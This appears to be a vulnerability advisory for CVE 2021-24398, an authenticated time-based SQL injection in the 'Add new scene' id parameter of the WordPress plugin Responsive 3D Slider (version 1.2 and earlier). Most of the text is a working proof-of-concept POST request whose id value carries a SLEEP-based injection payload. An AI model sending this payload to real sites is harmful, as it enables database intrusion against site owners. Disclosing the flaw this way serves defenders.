Responsive 3D Slider <= 1.2 – Authenticated SQL Injection | CVE 2021-24398

Description

The Add new scene functionality in the plugin uses an id parameter which is not sanitised, escaped or validated before being inserted to a SQL statement, leading to SQL injection. This is a time based SQLI and in the same function vulnerable parameter is passed twice so if we pass time as 5 seconds it takes 10 seconds to return since the query is ran twice.

Proof of Concept

POST /wp-admin/options-general.php?page=morpheus HTTP/1.1
Content-Length: 1042
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [admin+]
Connection: close

operation=0&itemselect4=&order1=1&title1=New scene&image1=&timage1=&video1=&beffect1=2&xeffect1=&colorc1=easeInOutElastic&colorb1=FFFFFF&total=1&stitle4=New slider&width4=1200&height4=600&border4=10000&op44=1000&color34=4&op114=0&op64=FFFFFF&op74=B5B5B5&op124=5&op84=50&op104=50&op24=50&op54=50&op14=1&number_thumbnails4=4&op34=10&round4=60&op154=000000&op94=FFFFFF&theight4=16&twidth4=5&sizetitle4=true&op134=000000&tborder4=FFFFFF&op144=1&font4=2&color14=000000&color24=0.5&thumbnail_round4=_self&e0=swirlFadeOutRotateFancy&or0=0&e1=slideDown&or1=1&e2=swirlFadeOutRotate&or2=2&e3=fade&or3=3&e4=boxFadeOutOriginalRotate&or4=4&e5=slideUp&or5=5&or6=6&or7=7&or8=8&or9=9&or10=10&or11=11&or12=12&or13=13&or14=14&or15=15&or16=16&or17=17&or18=18&or19=19&or20=20&or21=21&or22=22&or23=23&or24=24&or25=25&or26=26&or27=27&or28=28&or29=29&or30=30&or31=31&or32=32&or33=33&or34=34&or35=35&or36=36&or37=37&or38=38&or39=39&or40=40&or41=41&or42=42&or43=43&or44=44&or45=45&or46=46&or47=47&id=4%20AND%20(SELECT%204576%20FROM%20(SELECT(SLEEP(5)))QuMl)&submit=Save+Changes